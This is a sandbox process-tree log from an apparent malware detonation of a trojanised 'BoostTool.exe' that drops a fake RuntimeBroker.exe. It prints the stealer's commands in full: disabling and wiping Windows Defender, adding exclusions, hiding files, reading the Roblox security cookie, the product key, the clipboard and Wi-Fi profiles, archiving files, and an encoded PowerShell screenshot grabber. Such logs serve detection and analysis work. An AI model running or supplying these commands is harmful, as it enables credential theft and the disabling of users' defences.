                                                                                                                                                    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                    6⤵
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    PID:5492
                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0brmbloi\0brmbloi.cmdline"
                                                                                                                                                      7⤵
                                                                                                                                                        PID:4548
                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5AD8.tmp" "c:\Users\Admin\AppData\Local\Temp\0brmbloi\CSC8C6E39022321475381C3CCC850EFDF7F.TMP"
                                                                                                                                                          8⤵
                                                                                                                                                            PID:5984
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                      5⤵
                                                                                                                                                        PID:532
                                                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                                                          tree /A /F
                                                                                                                                                          6⤵
                                                                                                                                                            PID:5540
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                          5⤵
                                                                                                                                                            PID:1644
                                                                                                                                                            • C:\Windows\system32\tree.com
                                                                                                                                                              tree /A /F
                                                                                                                                                              6⤵
                                                                                                                                                                PID:5264
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                              5⤵
                                                                                                                                                                PID:5576
                                                                                                                                                                • C:\Windows\system32\tree.com
                                                                                                                                                                  tree /A /F
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:3844
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:5736
                                                                                                                                                                    • C:\Windows\system32\tree.com
                                                                                                                                                                      tree /A /F
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:1568
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:6016
                                                                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                                                                          tree /A /F
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:2188
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:5140
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              PID:2924
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:4772
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                PID:5044
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:1632
                                                                                                                                                                                • C:\Windows\system32\getmac.exe
                                                                                                                                                                                  getmac
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:3332
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI57482\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\1nDqt.zip" *"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:464
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI57482\rar.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\_MEI57482\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\1nDqt.zip" *
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:1800
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:4672
                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                        wmic os get Caption
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:5644
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:5456
                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                            wmic computersystem get totalphysicalmemory
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:5536
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:3108
                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                wmic csproduct get uuid
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:1128
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:3408
                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                    PID:5208
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:5860
                                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                      wmic path win32_VideoController get name
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Detects videocard installed
                                                                                                                                                                                                      PID:5740
                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:4812
                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        PID:4572
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                      PID:1688
                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                        ping localhost -n 3
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                        PID:5904
                                                                                                                                                                                            • C:\Users\Admin\Downloads\OneStopShop\BoostTool.exe
                                                                                                                                                                                              "C:\Users\Admin\Downloads\OneStopShop\BoostTool.exe"
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                              PID:3512
                                                                                                                                                                                              • C:\Users\Admin\Downloads\OneStopShop\._cache_BoostTool.exe
                                                                                                                                                                                                "C:\Users\Admin\Downloads\OneStopShop\._cache_BoostTool.exe"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:3808
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:1216
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    PID:5460
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'"
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:412
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                          PID:5648
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:6128
                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                            PID:2112
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • Hide Artifacts: Hidden Files and Directories
                                                                                                                                                                                                          PID:5240
                                                                                                                                                                                                          • C:\Windows\system32\attrib.exe
                                                                                                                                                                                                            attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                            PID:4508
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​  ‍.scr'"
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:4972
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​  ‍.scr'
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                              PID:4752
                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:3196
                                                                                                                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                tasklist /FO LIST
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                                                PID:5144
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:4196
                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                  tasklist /FO LIST
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:2664
                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:5068
                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                      PID:5288
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                    • Clipboard Data
                                                                                                                                                                                                                    PID:1228
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell Get-Clipboard
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Clipboard Data
                                                                                                                                                                                                                      PID:1264
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:5516
                                                                                                                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                        tasklist /FO LIST
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                                                                                        PID:1808
                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:1128
                                                                                                                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                                                                                                                          tree /A /F
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:3456
                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                                                                                                          PID:5992
                                                                                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                            netsh wlan show profile
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                                            • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                                                                                                            PID:3908
                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:5200
                                                                                                                                                                                                                            • C:\Windows\system32\systeminfo.exe
                                                                                                                                                                                                                              systeminfo
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Gathers system information
                                                                                                                                                                                                                              PID:5488
                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkA